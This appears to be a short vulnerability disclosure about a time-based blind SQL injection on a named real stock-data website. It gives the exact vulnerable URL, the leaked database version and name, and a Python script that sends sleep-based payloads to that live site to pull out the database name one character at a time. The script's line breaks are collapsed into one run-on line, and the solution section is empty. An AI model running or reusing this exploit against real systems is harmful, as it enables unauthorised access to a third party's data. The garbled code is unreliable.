Pseudo-static SQL injection (with verification script) exists in a station in flush)
...
Injection point: http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1 *
The asterisk (*) Position of the injection parameter.
The space is filtered and replaced by a plus sign (+). cache the space.
True
False
Version 5.5.27
Database datacenfer
#!/usr/bin/env python#-*-coding:utf-8-*-import stringimport requestsimport timepayloads = string.ascii_lowercase + string.digits + '_@. 'res = ''headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36'}for i in range(1, 20):for p in payloads:start_time = time.time()url = "http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1'+if((now()=sysdate())-(mid(database(),{},1)='{}'),1,sleep(1*3))+'1".format(i, p)req = requests.get(url)print req.urlif time.time() - start_time > 3:res = res + pprint "\n" + res + "\n"breakprint "\n\n[Finish]: " + res
Solution:
...